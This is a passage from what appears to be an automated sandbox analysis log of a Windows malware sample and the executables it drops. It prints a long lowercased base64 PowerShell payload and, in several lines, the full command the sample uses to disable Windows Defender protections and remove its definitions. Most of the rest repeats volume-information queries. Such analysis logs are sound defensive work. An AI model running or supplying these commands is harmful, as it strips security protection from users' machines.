gblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA27A9 cpuid 0_2_00DA27A9
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00DAD0AB
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\libssl-1_1.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\sqlite3.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip VolumeInformationJump to behavior
